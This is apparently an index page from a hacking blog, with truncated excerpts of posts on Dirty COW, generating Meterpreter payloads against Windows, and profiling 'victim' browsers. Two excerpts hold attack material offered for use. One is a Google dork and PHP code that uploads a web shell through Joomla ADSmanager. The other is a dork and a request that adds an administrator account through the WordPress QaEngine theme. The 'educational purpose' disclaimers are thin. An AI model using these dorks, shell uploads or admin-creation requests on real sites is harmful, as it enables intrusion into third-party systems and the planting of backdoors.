Dirty Cow (CVE-2016-5195) Privilege Escalation Demo

Dirty COW (CVE-2016-5195)

Dirty Cow (CVE-2016-5195) Privilege Escalation Demo. Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author

Meterpreter Session Hacking Windows 10

Meterpreter Session Hacking Windows 10 Goal: Hack windows 10, windows 8, windows 7, and windows xp. What you will Learn: How to use Msfvenom How to Start Msfconsole Meterpreter Basic Commands Step 1: Open terminal and type the following command to generate a payload. Now Payload is generated named my_virus.exe[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability   Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org CODE PHP : <?php $url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here $post = array ( “file” => “@shell.jpg”, “name” => “shell.php” ); $ch = curl_init (“$url“); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author

WordPress QaEngine Theme Exploit – Add User Admin

WordPress QaEngine Theme Exploit – Add User Admin This video demonstrate how to exploit wordpress QaEngine theme. This Exploit add user with administrator role. Note: ONLY for Educational Purpose. Dork = inurl:wp-content/themes/qaengine Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator Note: For Any Illegal Activity Hackaholic will not be responsible. Only For Educational Purpose. Plz[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author

Gather Victim Browser Information

Gather Victim Browser Information In this Video I will show you how you can gather victim browser information. Information will be: User-agent i.e what the browser User is using, what its version etc. What all plugins installed in users Browsers. What Operating System user is using. Platform of user. Screen[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author

Port Forwarding

Port Forwarding In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author